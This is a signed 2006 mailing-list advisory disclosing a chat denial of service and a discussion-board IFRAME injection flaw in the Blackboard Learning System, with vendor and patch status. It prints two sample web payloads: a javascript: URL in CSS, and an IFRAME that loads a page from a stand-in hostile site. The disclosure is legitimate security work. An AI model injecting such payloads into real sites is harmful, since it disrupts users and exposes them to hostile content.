[unisog] Multiple Vulnerabilities in Blackboard Learning System

Fixer fixer at gci.net
Sun Jun 18 03:00:59 GMT 2006


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#######################################################################

                             The InfoGuard Group Vulnerability Summary

Application:  Blackboard Learning System
                   http://www.blackboard.com
Versions:     All
Bugs:          Denial of Service, Malicious Code injection
Date:          17 June 2006
Author:       Charles H.
E-mail:       charles at infoguardgroup.com

#######################################################################


1) Introduction
2) Java Chat DoS
3) Discussion Board Malicious Code Injection
4) Patch Status

===========
1) Introduction
===========


The Blackboard Learning System? is a world-class software application
for institutions
dedicated to teaching and learning. Intuitive and easy-to-use, this
product has powerful
capabilities in three key areas: Instruction, Communication and Assessment.

from http://www.blackboard.com/products/as/learningsys/

=============
2) Java Chat DoS
=============


The Blackboard Learning System features a Java-based chat area for
instructors and
students to meet in real-time.  This chat room is subject to a Denial of
Service condition
via the use of Javascript.

When the following text is passed to the Java client, it results in a
DoS condition:

<div style="background-image: url(javascript:alert('foo'););">

The above Javascript results in all subsequent text not being displayed
on the screen.
In order to clear this condition all users must exit the chat room.
Additionally, testing
has shown that the instructor (or the first person in the chat room)
must log off and
log back on in order to reset the chat room to its default configuration.

STATUS:  This vulnerability was reported to the vendor in mid-February.
 Blackboard has
confirmed the presence of the vulnerability in all versions of
Blackboard and has assigned
a case ID.

=================================
3) Discussion Board Malicious Code Injection
=================================

One of the central facets of the Blackboard Learning System is its
discussion forums.
By default, <SCRIPT>  and other potentially malicious tags are filtered.
 However,
the use of <IFRAME> tags is not.  Aditionally, anything within the
<IFRAME> tags is
also not filtered.

This can result in the injection of malicious code from external
websites via the use of
the <IFRAME> tag.  A simple example of this would be as follows:

<IFRAME SRC = http://www.badguysite.com/evilpage.htm></IFRAME>

STATUS:  This vulnerability was reported to the vendor in mid-February.
 Blackboard has
confirmed the presence of the vulnerability in all versions of
Blackboard and has assigned
a Case ID.

============
4) Patch Status
============

No patch has been released by Blackboard yet.  The use of filtering
should be considered
as an interim measure.


#######################################################################


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBRJTB6wt0Y4479LtgAQIKvAgAvAoSX/pSmGnV8FbxhwHJI0V76Fxj/fKE
fRicKbK/a3iC0cPeX90Q6EQ44OEnI3fa6ToFYCZB+jktvta2Pg9l4YkNrsmJoP2u
wLsBUwrlXlT9kXKqYwA1Y30EBVdQ2l9Fi4NdkzXS85sxu3/yb0k3WinkSlTOo3LV
+I1Ju+mkECPOV4RjlPVabBY/inpOhVym05s5Di850TVvIluuJxse9hrXyAbWl9SI
KCjneUM2E6GTz+/fUzZxGP3nNUtbyisXmPhGE5ctSptRhWhAkOwXmMYC/bG2KUrC
SMKZQDFDlkWvtR3z/NMUWPEtEN3/0lNDfdYedl1qoh3BnujfL7pwwA==
=CpyE
-----END PGP SIGNATURE-----


More information about the unisog mailing list